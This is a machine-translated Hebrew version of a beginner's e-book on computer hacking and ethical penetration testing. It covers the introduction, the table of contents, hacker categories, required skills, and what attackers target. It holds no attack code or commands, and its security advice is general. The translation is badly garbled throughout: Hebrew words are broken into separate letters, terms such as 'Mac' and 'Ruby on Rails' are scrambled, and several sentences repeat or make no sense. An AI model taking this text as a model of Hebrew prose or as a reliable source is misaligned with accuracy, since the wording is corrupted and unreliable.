Hacking - Beginner To Expert Guide To Computer Hacking

Machine Translated by Google
‫‪Machine Translated by Google‬‬
‫פריצה‬
‫מדריך מת חי ל עד מומ חה לפריצת מ ח ש בים‪ ,‬א ב ט חה ב סי סית ו‬

‫בדי קת חדירה‬
‫מאת ג'יימ ס פ טר סון‬

‫פריצה‬
‫מדריך מת חי ל עד מומ חה לפריצת מ ח ש בים‪ ,‬א ב ט חה ב סי סית ו‬

‫בדי קת חדירה‬
‫מאת ג'יימ ס פ טר סון‬

‫מ בוא‬
‫אני רוצה להודות לך ו ל ברך אותך ע ל הורדת ה ספר "פריצה‪ :‬מדריך למת חי לים לפריצת מ ח ש בים‪ ,‬א ב ט חה ב סי סית ו בדי קות‬
‫”‬
‫חדירה‪.‬‬
‫ספר זהי למד אותך כיצד תו כ ל להגן ע ל עצמך מפני רו ב הת קפות הפריצה הנפוצות ‪ --‬ע לידיידיעתך כיצד הפריצה פוע לת‬
‫בפוע ל! א חרי ה כ ל‪ ,‬כדי למנוע מהמער כת ש לך להיפגע‪ ,‬אתה צריך להי שאר צעד לפני כ ל הא קר פ לי לי‪ .‬אתהי כו ל לע שות‬
‫זאת ע לידי לימוד כיצד לפרוץ ו כיצד ל בצע פריצה נגדית‪.‬‬
‫בתוך ספר זה ט כני קות ו כ לים המ שמ שים הא קרים פ לי ליים ואתיים כא חד ‪ -‬כ ל הד ברים שתמצאו כאןיראו ל כם כיצד ניתן‬
‫ל ס כן א ב ט חת מידע ו כיצד תו כ לו לזהות הת קפה במער כת שאתם מנ סים להגן ע ליה‪ . .‬במ ק בי ל‪ ,‬ת למדו גם כיצד תו כ לו‬
‫למזער נז קים במער כת ש ל כם או לעצור מת קפה מתמ ש כת‪.‬‬
‫שו ב תודה שהורדת את ה ספר הזה‪ .‬אני מ קווה שתהנה מזה!‬

‫תו כן העניינים‬
‫מ בוא‬
‫תו כן העניינים‬
‫פר ק ‪ 1:‬פריצה ‪101‬‬

‫מי פורץ?‬
‫האם הא קינג מתאים ל כו לם?‬

‫מה ת ק ב ל כאן‬
‫האם ק שה ל למוד ו לה בין?‬
‫מיומנויות שאתה צריך‬
‫פר ק ‪ 2:‬כיצד הא קרים מוצאים את המ טרות ש להם‬

‫ד ברים שהא קרים מ חפ שים‬
‫ה קמת תו כנית פריצה‬
‫ל ק בוע מ טרות‬
‫פר ק ‪ 3:‬מיפוי הפריצות ש לך‬
‫ארגון הפרוי ק ט ש לך‬

‫מתי כדאי להת חי ל לפרוץ?‬
‫מה א חרים רואים?‬
‫מיפוי הר שת‬
‫ביצוע סרי קות מער כת‬

‫מ ב ט ע ל פגיעויות מער כת‬
‫פר ק ‪ 4:‬ע ל הת קפות‬
‫מהי הת קפה פ סי בית?‬
‫מהי הת קפה א ק טי בית?‬
‫פר ק ‪ 5:‬כ לי פריצה‬

‫פר ק ‪6:‬איך ל ש טות במ טרות‬
‫זיוף‬
‫הת קפות אדם‪ -‬באמצע‬
‫פר ק ‪ 7:‬פריצת סי סמאות‬

‫איך לפצ ח סי סמאות‬
‫הערות ע ל הצפנת סי סמה‬
‫דר כים א חרות ל ח שוף סי סמאות‬

‫פר ק ‪ 8:‬פריצת חי בורי ר שת‬
‫פריצת חי בור ‪WEP‬‬
‫‪The Evil Twin Hack‬‬
‫פר ק ‪ 9:‬מ בוא לפריצה לנייד‬
‫פריצת אפ לי קציות לנייד‬
‫ניצו ל מ כ שיר נייד מר חו ק‬

‫פר ק ‪10:‬הנד סה ח ברתית‬
‫הנד סה ח ברתית כאמנות ומדע‬
‫איך הנד סה ח ברתית מתר ח שת‬
‫סוגי הת קפות הנד סה ח ברתית‬
‫מה אתהי כו ל לע שות נגד הנד סה ח ברתית‬
‫פר ק ‪11:‬הת קפות פיזיות‬
‫למה הת קפות פיזיות עו בדות‬
‫גי לוי פגיעויות‬
‫א ב ט חת הפריפריה‬
‫סי כום‬
‫פר ק ‪ 1:‬פריצה ‪101‬‬
‫ב כ ל פעם שאתה נת ק ל במי לה פריצה‪ ,‬אתה כנראה מ שייך אותה ל ש לי חת תו כנית מוצפנת למ שתמ ש א חר‪ ,‬ואזי כו לת ל ק ב ל‬
‫גי שה לא מור שית במ ח ש ב מרו ח ק‪.‬‬
‫עם זאת‪ ,‬המונ ח פריצה שימ ש כדי להגדיר כ ל פעו לה ש ל התע ס קות ב חומרה או בתו כנה ש ל מ ח ש ב מ ל בד ה שימו ש המיועד‪,‬‬
‫ע ל מנת ל שפר אותה ו לג לות כיצד מ כ שירים א ל ק טרונייםי כו לים לע בוד באופן א ל ק טרוני‪ .‬באופן א ל ק טרוני‪.‬‬
‫למרות שההגדרה הזו מ ב חינה ט כנית עדיין מת קיימת‪ ,‬הפריצה בה ח ל ט ע שתה תפנית חד שה לגמרי‪ ,‬במיו חד כ שזה מגיע‬
‫לאופן ש בו אדם א חרי כו ל לג שת למ ח ש ב ש ל מי שהו א חר‪ .‬לפני שאתם חו ש בים שהא קינג הוא ר ק הע ברת ניירות ערך כדי‬
‫לזרוע הר ס במ כ שיר הדיגי ט לי ש ל מי שהו א חר‪,‬יית כן שתצ טר כו לה כיר את סוגי הא קרים ה קיימים בימינו‪.‬‬
‫מי פורץ?‬
‫הא קרים מ חו ל קים בדרך כ ל ל ל ק טגוריות ה באות‪:‬‬
‫‪1.‬הא קרים כו בע ש חור‬
‫ידועים גם בתור הא קרים פ לי ליים או קר קרים‪ ,‬אנ שים א לה הם א לה שמ ק ב לים בזדון גי שה למער כת ש ל אדם א חר למען רוו ח אנו כי‪ .‬הם בדרך כ ל ל פורצים‬
‫מ כ שירים א ל ק טרוניים ומ שנים‪ ,‬גונ בים או מו ח קים ק בצים קרי טיים למען הרוו ח האי שי ש להם‪.‬‬
‫‪2.‬הא קרים כו בע ל בן‬
‫הא קרים ש ל כו בע ל בן‪ ,‬או הא קרים אתיים‪ ,‬מג לים דר כים כיצד ניתן לנצ ל את המער כת ש ל המ כ שיר כדי ל למוד כיצד אנ שיםי כו לים להגן ע ל עצמם מפני‬
‫הת קפות אפ שריות‪ .‬הא קרים האתיים ה ל לו גם מ קפידים ע ל עד כון שירותי הא ב ט חה שהם מנפי קים‪ .‬הם עו שים זאת ע לידי שמירה ע ל מע ק ב ו חפירה‬
‫פעי לה א חר הניצו ל ה חד ש ביותר ופגיעויות מער כת חד שות‪.‬‬
‫הא קרים אתיים גם מ קפידים ע ל כך שהם מג לים דר כים חד שות ל למוד כיצד ניתן להתע ס ק עם מ כ שיר א ל ק טרוני כדי למ ק סם את היעי לות ש לו‪ .‬מ סי בה זו‪,‬‬
‫הם בונים קהי לות המאפ שרות להם לא סוף את הידע ש להם כדי ל שפר את האופן ש בו אנ שים מ שתמ שים במ כ שירים ש להם‪.‬‬
‫‪3.‬הא קרים ש ל כו בע אפור‬
‫כפי שה שם מרמז‪ ,‬הם מונעים ממניעים ש ל פריצת כו בע ל בן ו ש חור ‪-‬הם א לה שמ שתמ שים ב ט כני קות לא חו קיות ו חו קיות כא חד כדי לנצ ל או ל שפר‬
‫מער כת‪ .‬עם זאת‪ ,‬אם הא קר כו בע אפור מנצ ל את המער כת ש ל אדם א חר‪ ,‬הוא בדרך כ ל ל מ קפיד ליידע את ה בע לים ע ל הניצו ל שנע שה ואז מציע הצעות‬
‫מה ניתן לע שות כדי ל שפר את א ב ט חת המער כת‪.‬‬
‫ברגע שתצ לי חו לזהות את ההא קרים שאתם צפויים להית ק ל בהם‪ ,‬תו כ לו לדעת את המו טי בציה שי ש להם לפריצה ואת סוגי הפריצות שהם צפויים‬
‫להמציא‪.‬‬
‫האם הא קינג מתאים ל כו לם?‬
‫בעוד שהפריצה מיו ח סת בדרך כ ל ל לאנ שים שיודעים ל קוד‪ ,‬כ ל א חדי כו ל ל למוד כיצד לפרוץ‪.‬י חד עם זאת‪ ,‬עדיף גם לז כור‬
‫שאין דרך א חת ל למוד כיצד לפרוץ – פריצות ל שיפור או לת קוף מער כות נוצרות באמצעות א בו לוציה מתמ ש כת ש ל הידע‬
‫ש ל המ שתמ ש ע ל ביצועי המער כת‪ .‬כ שאתה קורא את זה‪ ,‬אתהי כו ל ל סמוך ע ל האפ שרות ש כ בר נוצרה דרך חד שה להגן או‬
‫לת קוף מ כ שיר או ר שת‪.‬‬
‫אםי ש לך מ ח ש ב או ט לפון נייד‪ ,‬אז אתה המועמד ה טו ב ביותר להיות הא קר‪.‬י ש לך את המו טי בציה הנ כונה ל למוד איך‬
‫להתע ס ק עם מער כת ו ל שפר את אופן ה שימו ש בה‪ .‬מ כיוון שאתה מת ח בר למ שתמ שים א חרים ב חוץ באמצעות הורדות‪,‬‬
‫הודעות‪ ,‬ר כי שות מ קוונות או הע לאות‪ ,‬אתה צריך ל שים ל ביותר לאופן ש בו אתהי כו ל לא ב ט ח את המער כת ש לך‪ .‬כדי‬
‫לע שות זאת‪ ,‬אתה צריך ל למוד איך הא קר כו בע ש חור חו ש ב‪ ,‬ה ח ל מהמו טי בציה שי ש לו לת קוף מער כת‪ ,‬ועדי סודות‬
‫ההת קפה‪ .‬מנ קודה זו‪ ,‬ת בינו שי ש ל כם שפע ש ל אמצעי מניעה ב כ ל הנוגע לעצירת חדירה ב לתי מור שית ואפי לו הפע לת‬
‫מת קפת נגד‪.‬‬
‫מה ת ק ב ל כאן‬
‫ספר זהי ספר ל כם ע ל הא ס טר טגיות הנפוצות ב שימו ש ע לידי הא קרים עם כו בע ש חור‪ ,‬שיאפ שרו ל כם ל בדו ק את נ קודות‬
‫התורפה ש ל המער כת ש ל כם ו כיצד תו כ לו ליפו ל למ ל כודות שונות המונ חות ע בור רו ב המ שתמ שים ב חוץ‪ .‬כאן ת למד כיצד‬
‫אנ שים הופ כים להיות מועמדים להפוך ל קור בנות פו טנציא ליים ש ל הא קרים פ לי ליים ו כיצד אתהי כו ל להגן ע ל עצמך מפני‬
‫הת קפות כא לה‪ .‬ב ש ל ב זה‪ ,‬אתה מ בין את הרעיון ‪-‬אתה בדרך להפוך להא קר אתי‪.‬‬
‫מ כיוון שהדאגה העי קרית ש לך היא הא ב ט חה ש לך ו בה קפדה ע ל כך שאתה מ בין מדוע הת קפות עו ברות דרך מער כות‬
‫שונות‪ ,‬תצ טרך גם ל למוד כיצד מת בצעות הת קפות מ ל כת חי לה‪ .‬תו כ ל לה בין כיצד הא קרים פ לי ליים חודרים למ כ שירים ע ל‬
‫ידי לימוד כ לים‪ ,‬ט כני קות והת קפות שהם מ שתמ שים בהם ב ס חר ש להם‪.‬‬
‫ברגע שת בינו כיצד ניתן להתפ שר ע ל מ כ שיר א ל ק טרוני‪,‬יהיה ל כם מו שג טו ביותר מה אתםי כו לים לע שות כדי למנוע את זה‪.‬‬
‫האם ק שה ל למוד ו לה בין?‬
‫אמנם פריצה דור שת תרגו ל ר ב‪ ,‬א ב ל זה לא ע ס ק ק שה להיות בו‪ .‬כ ל עוד אתהיודע איך לה שתמ ש במ ח ש ב ואתהי כו ל‬
‫לע קו ב א חר ההוראות שתמצא ב ספר זה‪ ,‬אתהי כו ל ל בדו ק או אפי לו ל בצע פריצות שאתהי קראו בפר קים ה באים‪.‬‬
‫אם אינךיודע כיצד ל קודד עדיין‪ ,‬א ל דאגה ‪-‬תו כ ל למצוא הוראות מפור טות לג בי תו כנת קידוד‪ ,‬מער כת הפע לה וא חרות‬
‫בהמ שך‪ .‬עם זאת‪ ,‬אם אתה רוצה להצ טיין בפריצה ואתה רוצה לפת ח אמצעי א ב ט חה מ ש לך או ל ב חון גר סה ש ל הת קפה‪,‬‬
‫אזי ש צורך ב כי שורי קידוד‪.‬‬
‫מיומנויות שאתה צריך‬
‫כדי להפוך להא קר אתי טו ב‪ ,‬אתה צריך להיות בע ל ה כי שורים ה באים‪:‬‬
‫‪ 1.‬כי שורי מ ח ש ב בינוניים‬
‫זה אומר שאתה צריך להיות בע ל כי שורים ש חורגים מיצירת מ סמך וורד או הי כו לת לג לו ש באינ טרנ ט‪ .‬כדי להיות הא קר‪ ,‬אתה צריך‬
‫לדעת איך לה שתמ ש ב שורות פ קודה שונות ש ל ‪ Windows,‬להגדיר ר שת או לערוך את הרי שום ש ל המ ח ש ב ש לך‪.‬‬
‫‪ 2.‬כי שורי נ טוור קינג טו בים‬
‫מ כיוון שר בות‪ ,‬אם לא רו בן‪ ,‬מהת קפות הא קרים נע שות באופן מ קוון‪ ,‬ע ליך ל ש לו ט במו שגים ו במונ חים ש ל ר שת‪ ,‬כגון‪:‬‬
‫‪ WEP‬לעומת סי סמאות ‪WPS‬‬
‫‪NAT‬‬
‫כתו בות ‪MAC‬‬
‫נת בים‬
‫נמ לים‬
‫‪VPN‬‬
‫‪IPv6‬‬
‫‪DNS‬‬
‫ר שת מ שנה‬
‫‪DHCP‬‬
‫כתו בות ‪ IP‬פר טיות וצי בוריות‬
‫‪IPv4‬‬
‫דוגמנות ‪OSI‬‬
‫מנות‬
‫‪TCP/IP‬‬
‫‪ 3.‬שימו ש במער כת הפע לה לינו ק ס‬
‫כמע ט כ ל ההא קריםיצ טר כו לה שתמ ש במער כת ההפע לה לינו ק ס מ כיוון שהיא מאפ שרת תו כניות ותי קונים שאינם אפ שריים‬
‫במער כות ההפע לה ‪ Windows‬ו‪ .caM-‬כמע ט כ ל כ לי הפריצה שתו כ לו למצוא גם עו שים שימו ש במער כת הפע לה זו‪.‬‬
‫‪4.‬ויר טוא ליזציה‬

‫לפני שאתה ב כ ל ל מנ סה ל בדו ק הת קפה ע ל מער כת חיה‪ ,‬אתה צריך לוודא שאתהיודע מה אתה עו שה‪ .‬כדי לוודא שאתה‬
‫עו שה ד ברים נ כון‪ ,‬או לי תרצה לנ סות פריצה ת חי לה ע ל ח בי לת תו כנות ויר טוא ליזציה‪ ,‬כגון ‪ VMWare Workstation.‬שימו ש‬
‫בת חנות ע בודה ויר טוא ליותי ספ ק לך ס בי בה ב טו חה ל בדי קות הפריצה ש לך וימנע ממך לגרום נז ק למ כ שיר ש לך ב שוגג‪.‬‬
‫‪5. Tcpdump‬או ‪Wireshark‬‬
‫‪-tcpdump‬הידוע בתור מנת ח פרו טו קו ל שורת פ קודה או סניפר‪ ,‬בעוד ‪Wireshark‬ידוע כ כ לי הפופו לרי ביותר ש קיים‬
‫שעו שה את אותה פונ קציה‪.‬‬
‫‪6.‬ה כרת ט כנו לוגיות ומו שגי א ב ט חה‬
‫כ ל הא קר אמור להיות מ סוג ל לה בין את המו שגים וה ט כנו לוגיות ה ח שו בים ביותר ה ק שורים ל ט כנו לוגיית מידע‪ .‬מ סי בה זו‪,‬‬
‫ע ליך לה כיר ט כנו לוגיה ומו שגים א ל חו טיים‪ ,‬כגון ‪ Secure Sockets Layer (SSL),‬חומות א ש‪ ,‬מער כת זיהוי חדירה ‪(IDS),‬‬
‫ת שתית מפת ח צי בורי )‪ (PKI‬ו כן ה לאה‪.‬‬
‫‪ 7.‬כי שורי ת סרי ט‬
‫הי כו לת ליצור ו לערוך ס קריפ טים מאפ שרת לך ליצור כ לים מ ש לך ו להצ לי ח להיות עצמאיים מה כ לים שפות חו ע לידי הא קרים‬
‫א חרים‪ .‬ע לידי הי כו לת ל בנות כ לים מ ש לך‪ ,‬אתה מאפ שר לעצמך לפת ח הגנות טו בותיותר כא שר הא קרים פ לי לייםיוצרים‬
‫פריצות טו בותיותר‪ .‬כדי לע שות זאת‪ ,‬ע ליך להיות מ קצוען ב שימו ש לפ חות בא חת מ שפות ה ס קריפ ט הנפוצות‪ ,‬כגון ‪Rails‬‬
‫‪Ruby on‬או ‪Python.‬‬
‫‪ 8.‬מיומנויות מ סד נתונים‬
‫אם אתה רוצה לה בין איך הא קרים חודרים ל ב סי סי הנתונים ש ל המער כת ש לך‪ ,‬אתה צריך לדאוג שאתהיודע איך מ סדי‬
‫נתונים עו בדים‪ .‬זה אומר שאתה צריך ל ש לו ט במער כת ניהו ל מ סד נתונים כגון ‪Oracle‬או ‪MySQL.‬‬
‫‪9.‬הנד סה לא חור‬
‫הנד סה לא חור מאפ שרת לך להמיר תו כנה זדונית או ניצו ל דומה ל כ לי פריצה מת קדםיותר‪ .‬עם המיומנות הזו מגיעה הה בנה‬
‫ש כמע ט כ ל הניצו ל שנע שה ע לידי הא קרים מגיע מניצו לים קיימים א חרים ‪ -‬ברגע שת בין כיצד פוע לת ת כונת תו כנה זדונית‬
‫או ניצו ל‪ ,‬תהיה לך ה בנה טו בהיותר כיצד פריצות א חרות פוע לות נגד מער כת‪.‬‬
‫‪ 10.‬קריפ טוגרפיה‬
‫קריפ טוגרפיה‪ ,‬כמיומנות‪ ,‬מאפ שרת לך לה בין כיצד הא קרים מ סתירים פעי לויות ומ סתירים את ע ק בותיהם בזמן ביצוע‬
‫פריצות‪ .‬זה גם עוזר לך לה בין את ה חוז קות וה חו ל שות ש ל א לגוריתמים שונים המ שמ שים לפענו ח מידע אי שי‪ ,‬כגון סי סמאות‬
‫מאו ח סנות‪.‬‬
‫פר ק ‪ 2:‬כיצד הא קרים מוצאים את המ טרות ש להם‬
‫הא קרים פ לי ליים הם כנראה בין ה חו קרים הא ס טר טגיים ביותר שתפג שו בעו לם ה ט כנו לוגיה‪ .‬ע ל מנת שההא קרי שיג כמה‬
‫שיותר נתוניםי קרי ערך ב שיגור הת קפה בודדת‪ ,‬הם מ ח כים שה קור בן המו ש לםיופיע ב סוויפ ש להם‪,‬י ח קור את ה טרף ש לו‪,‬‬
‫ואזימציא את המת קפה ה טו בה ביותר שהםי כו לים לגיי ס מהמיומנות ש להם‪ .‬מַ ֲע ֶר כֶת‪.‬‬
‫הת קפת כו בע ש חורי כו לה ל כוון לאדם בודד או ל כמה אנ שים בו זמנית‪ ,‬אך לרו ב‪ ,‬הא קר פוע ל בני שה מ סוימת‪.‬י שנם הא קרים‬
‫שירצו למצוא נ קודות תורפה במער כות בנ קאיות באינ טרנ ט‪ ,‬כי זהי ספ ק להם גי שה למי ליוני פי קדונות שהםי כו לים להע לים‬
‫דרך המער כות ש להם‪.‬‬
‫ח ל קם מערי כים מידע אי שי וממ שי כים ל בצע הת קפות אי שיות‪.‬י ש המעדיפים לה ש חית דפי נ חיתה ו ל שדר אתי כו לתם לע בור‬
‫דרך א ב ט חת אתר אינ טרנ ט‪ .‬ח ל קם בו חרים לפרוץ ח ש בונות כדי שיו כ לו להי שאר אנונימיים ו לע שות שימו ש ב שירותים מ ב לי‬
‫ל ש לם אגורה‪.‬‬
‫לא מ שנה מה המניע ש ל ההא קר הפ לי לי בפריצה למער כת מ סוימת‪ ,‬הםימ שי כו במת קפה ר ק אם הםיג לו שאפ שר לע שות‬
‫את זה ו שהםי כו לים להרווי ח מזה מ שהו‪ .‬עם זאת‪ ,‬הדרך ה טו בה ביותר למנוע הת קפת פריצה היא ל שמור מידעי קר ערך‬
‫מהצי בור כ כ ל האפ שר‪ .‬בעוד ש שיתוף מידע כמע ט נ ח ש ב כה כר ח בימינו‪ ,‬אתה צריך לוודא שאתה מ שתף נתונים ר ק עם‬
‫מ שתמ שים לגי טימיים‪.‬‬
‫ד ברים שהא קרים מ חפ שים‬
‫לרגע‪ ,‬הי כנ ס לתוך מו חו ש ל הא קר פ לי לי‪ .‬אם אתה רוצה לגנו ב מידע או ל ס כן מער כת‪ ,‬אתהיודע שאתהי כו ל להפי ק ערך‬
‫מהד ברים ה באים‪:‬‬
‫‪ 1.‬עיצו ב ארגון‪ ,‬הג שות ורי שום‬
‫הא קרים זדוניים מ בצעים בדרך כ ל ל חיפו ש מ קוון כדי ל חפ ש מ טרות אפ שריות‪ ,‬ו בין המועמדים ה טו בים ביותר למת קפה הם‬
‫אותם ארגונים המ ספ קים תיאורים מפור טים ש ל מ כ שירים שי ש להם גי שה א ליהם‪ ,‬כו ל ל סוג התו כנה וה חומרה שהם הת קינו‪.‬‬
‫ברגע שהא קריםיודעים ש לאדם מ סויםי ש גי שה לנ קודה או לי פגיעה בא ב ט חה ה ט כנו לוגית ש ל הארגון‪ ,‬הם מ ק ב לים מו שג‬
‫למי ע ליהם לפרוץ רא שון‪.‬‬
‫כ ל הא קרי כו ל לה שיג מידע שימו שי במיו חד זה ב חיפו ש מ קוון פ שו ט‪ .‬ע לידי חפירה מ קוונת‪ ,‬תו כ ל למצוא את כ ל הרי שומים‬
‫ש ל ‪-SEC,‬הההצעות הצי בוריות‪ ,‬ה ק בצים הנגי שים לצי בור‪ ,‬מנויים ועוד ר בים א חרים‪ .‬אתהי כו ל אפי לו ל חפ ש את כ ל האנ שים‬
‫המעור בים בארגון מ סוים‪ ,‬את מועד פר סום האתר ואת מנה ל האתר המעור ב ביצירת א ב ט חת אינ טרנ ט ע בור ארגון‪ .‬הידע‬
‫הזהי כו ל ב ק לות לעזור להא קר להת כונן למת קפה מ קוונת מ סי בית שי כו לה להפי ל את האתר ואת מ סד הנתונים ש ל ארגון‬
‫ש לם‪.‬‬
‫‪ 2.‬מנויים ות ש לומים‬
‫הא קרים נו טים לפרוץ מ כ שירים ו ח ש בונות ב בע לות אדם שמ בצע ת ש לומים או ר כי שות מ קוונות‪ .‬מ כיוון ש סמאר טפונים‪ ,‬מיי לים‬
‫ומער כות ת ש לום מ קוונות מ כי לים שפע ש ל מידע אי שי‪ ,‬כו ל ל כר טי סי א שראי ודפי בנ ק‪ ,‬פריצה למער כות א לו מ ק לה ע ל כ ל‬
‫הא קר פ לי לי לה שיג גני בת זהות‪.‬‬
‫‪ 3.‬ח ש בונות מדיה ח ברתית‬
‫בעוד שי ש מי שיגידו שאו לי אין שום ד בר בע ל ערך ב ח ש בון פיי ס בו ק אי שי‪ ,‬הי כו לת ל ק ב ל גי שה ל ח ש בונות מדיה ח ברתית גם‬
‫מאפ שרת להא קר ל ק ב ל גי שה לפר טים אי שיים א חרים‪ ,‬כגון סי סמאות‪ ,‬מיי לים ומ ספרי ט לפון ניידים‪.‬‬
‫‪ 4.‬מיי לים‬
‫הודעות דוא" ל מ שמ שות כמר כז המידע האי שי ש לך מ כיוון שהוא מ שמ ש כנ קודת ב קרה ל כ ל ה סי סמאות ש לך‪ ,‬ח ש בונות‬
‫ת ש לום מ קוונים‪ ,‬בין היתר‪.‬‬
‫‪ 5.‬סי סמאות‬
‫הא קרים ר בים מ בצעים הת קפה שנע שתה כדי ל חזות‪ ,‬ל ח ט ט או להת חזות ל סי סמה ש ל מ שתמ ש‪ .‬פעם הם‬
‫מ סוג לים למצוא סי סמה בודדת‪ ,‬הם כמע ט ב טו חים שמ שתמ ש ע שוי לה שתמ ש בהם ע בור ח ש בונות שונים או לה שתמ ש‬
‫בגר סה ש לה ע בור כני סות א חרות‪.‬‬
‫‪ 6.‬חומרה פיזית‬
‫ה כי ק ל לגנו ב מידע כ שי ש לך גי שה פיזית למ כ שיר כמו סמאר טפון או מ ח ש ב אי שי‪ .‬אתהי כו ל ל בדו ק ב ק לות את כ ל ה ח ש בונות‬
‫שניג שים א ליהם דרך הרי שום‪ ,‬הי ס טוריית הדפדפן או סי סמאות שמורות אפי לו ב לי צורך לה שתמ ש ב קוד‪.‬י חד עם זאת‪ ,‬גי שה‬
‫פיזית למ כ שיר מאפ שרת לך גם לאפ שר ל שתו ל מ כ שיר האזנה במער כת ש לו ע ל מנת לדוג כ ל מידע נו סף ב כ ל נ קודה בעתיד‪.‬‬
‫‪ 7.‬מו קד מי קומים‬
‫אם הא קר לאי כו ל למצוא עדיין פגיעות במער כת שהוא רוצה לפרוץ‪ ,‬הד בר ה בא שהואינ סה למצוא הוא הי כן נמצאת‬
‫מער כת המ ח ש ב‪ .‬זהיאפ שר לו להמ שיך ו ל ח קור נ קודות תורפה באמצעות הנד סה ח ברתית‪ ,‬צ לי לה לא שפה‪ ,‬או אפי לו ה שגת‬
‫גי שה פיזית למ כ שיר ממו קד‪.‬‬
‫מ כיוון ש ל כ ל המ ח ש ביםי ש כתו בת ‪ MAC,‬ו ל כ ל מ כ שיר המ חו בר דרך האינ טרנ טי ש כתו בת ‪IP,‬ניתן ל חפ ש ב ק לות כ ל מ כ שיר‬
‫בעו לם ע ל מנת לה בין הי כן הוא נמצא‪ .‬הא קר‪ ,‬לעומת זאת‪,‬יודע לה סתיר את מי קומו כדי להי שאר ב לתי מזוהה בזמן שהוא‬
‫יוצא להת קפה‪.‬‬
‫ה קמת תו כנית פריצה‬
‫כא שר אתה רוצה להגן ע ל המער כת ש לך‪ ,‬אתה צריך לדעת הי כן אתהי כו ל להיות מות קף ע לידי הא קר‪.‬‬
‫זה אומר ש כדי לתפו ס גנ ב‪ ,‬אתה צריך ל ח שו ב כמו א חד‪.‬‬
‫כעת‪ ,‬לא חר שי ש לך מו שג מה הא קר ע שוי ל חפ ש ב כ ל פעם שהוא מ בצע סוויפ‪ ,‬אתהיודע הי כן להת חי ל ליצור את נ קודות‬
‫הא ב ט חה ש לך והי כן ע ליך ל בדו ק נ קודות תורפה‪.‬‬
‫ב ש ל ב זה‪ ,‬אתה מ ק ב ל מו שג מדוע הא קר מ סוים ע שוי להצ ביע ע ל ארגון מ סוים‪ ,‬אדם מ סוים או מ כ שיר בודד כמ טרה‪ .‬כ ל‬
‫הא קר ח כםיתמ קד בנ קודות התורפה ה באות‪:‬‬
‫‪ 1.‬מ שתמ ש או מ טפ ל שאו ליי שאיר את המ כ שיר המיועד ל לא ה שג חה‬
‫‪ 2.‬סי סמאות ח ל שות או ל לא שינוי המ שמ שות או לי ב כ ל המ כ שירים המ סונ כרנים‬
‫‪ 3.‬בע לי מ כ שירים שאינם מודעים למור כ בות המער כת ש להם‪ ,‬או שאינם מעוד כנים בפרו טו קו לי א ב ט חה‬
‫כא שר אתה חו ש ב ע ל אופן ניהו ל המ ח ש בים וה קי שוריות לאינ טרנ ט‪ ,‬אתה מ ק ב ל את הרעיון שרו ב המער כות ש בהן אתה‬
‫מ שתמ ש ע ל ב סי סיומי אינן מאו ב ט חות כפי שאתה רוצה שהןיהיו‪ .‬הא קריםיודעים זאת‪ ,‬ומ סי בה זו‪ ,‬הםי כו לים להיות ב טו חים‬
‫שי שנן נ קודות קי שוריות מ סוימות שאינן מנו טרות כ ל ל או שי שנן נ קודות מ סוימות ב חומת א ש שניתן לפרוץ ב ק לות מ ב לי‬
‫שיזוהו‪ .‬זה גם ק ל ל כ ל הא קר לנצ ל ס בי בה שהוא רוצה לת קוף‪ ,‬במיו חד כא שר הםיודעים שהםי כו לים ל ק ב ל גי שה מ לאה‬
‫מ ב לי להתריע בפני מנה לי מער כת‪.‬‬
‫ברגע שפגיעות מתג לה ע לידי הא קר פ לי לי‪ ,‬אתה לאי כו ל לצפות שהא קרי שמור אותה לעצמו‪ .‬כ ל ההא קרים מ סוג לים‬
‫להת ח בר לעצמם בר שת כדי ל שדר את הפעי לויות ש להם ו ל ק ב ל תמי כה מא חרים ב קהי לה‪ .‬מ כיוון שרו ב מנה לי המער כת‬
‫וצוותי ‪-IT‬ההרגי לים אינם מ בינים מתי מת קפה עומדת להתר ח ש או מהי באמת הפגיעות ש ל המער כת ש להם‪ ,‬להא קרים‬
‫פ לי לייםי ש את מר ח ב הפעו לה ל קנות זמן כדי ל למוד מה תהיה המת קפה ה שימו שית ביותר‪ .‬מ כיוון שתו קפים פ לי ליים שות לים‬
‫את ההת קפות ש להם‪ ,‬נעים לא ט מאוד כדי להימנע מזיהוי ומ שגרים בזמן הפגיע ביותר‪ ,‬ע ליך גם ליצור תו כנית פריצה אתית‬
‫ת קינה כדי למנוע כ ל הת קפה‪.‬‬
‫ל ק בוע מ טרות‬
‫אתה צריך לה קיםיעדי פריצה מ ש לך ע לידי גי לוי נ קודות התורפה ש ל המער כת ש לך כדי ל ב ס ס מ ספי ק א ב ט חה כדי להגן‬
‫ע ליהם מפני הת קפות‪ .‬מ כיוון שאתה הו לך נגד אוי ב ערמומי מאוד‪ ,‬אתה צריך ל ק בועיעדים ו לו חות זמנים מאוד ספציפיים‬
‫לג בי מתי אתהי כו ל להת חי ל לפרוץ למער כת ש לך‪.‬‬
‫הערה ח שו בה ‪ :‬ז כור ש לפני שאתהיוצר תו כנית‪ ,‬ע ליך לוודא שי ש לך את כ ל האי שורים ל בדי קת מער כות‪ .‬כמו כן‪ ,‬ה קפד‬
‫לתעד פריצה אתית ומער כת ש בד קת ע ליהן‪ ,‬ו ל ספ ק עות ק ש ל התיעוד להנה לה‪ .‬זהיוודא שי ש לך את ההגנה הדרו שה לך‬
‫ר ק ב כ ל מ קרה שתג לה שמער כת נפגעת או כ שמ שהו ב לתי צפוי קורה ב ח קירה ש לך‪.‬‬
‫אם אתם בוד קים מער כת מ ש ל כם‪ ,‬תיעוד ה כ ל‪ ,‬כו ל ל כ ל פריפריות התו כנה ש בד קתם ו סוג ה בדי קות ש ביצעתם‪ ,‬הוא חו בה‪.‬‬
‫זהי ב טי ח שע שיתם נ כון את כ ל ה ש ל בים‪ ,‬ואם תצ טר כו ל חזור ע ל ע ק בותי כם‪,‬י ש ל כם רעיון לאן כדאי ל חזור‪.‬‬
‫ברגע שאתה מ סוג ל לע קו ב א חר כ ל פרו טו קו ל א ב ט חה ה כר חי‪ ,‬שא ל את עצמך את ה שא לות ה באות‪:‬‬
‫‪ 1.‬ע ל איזה סוג מידע במער כת ש לך אתה צריך להגן ה כי הר בה?‬
‫אתה צריך ל ק בוע איזה ח ל ק במער כת ש לך הוא ה חיוני ביותר ע בורך‪ .‬אם אתה מ חזי ק במאגר מידע אי שי או קו בץ ש ל פרוי ק ט‬
‫ח שו ב שר בים היו רוצים ל שים ע ליו את היד‪ ,‬אז הגיוני שתגן ע ל ה ק בצים הא לה קודם‪.‬‬
‫‪ 2.‬מה הת קצי ב ש לך לפריצה אתית?‬
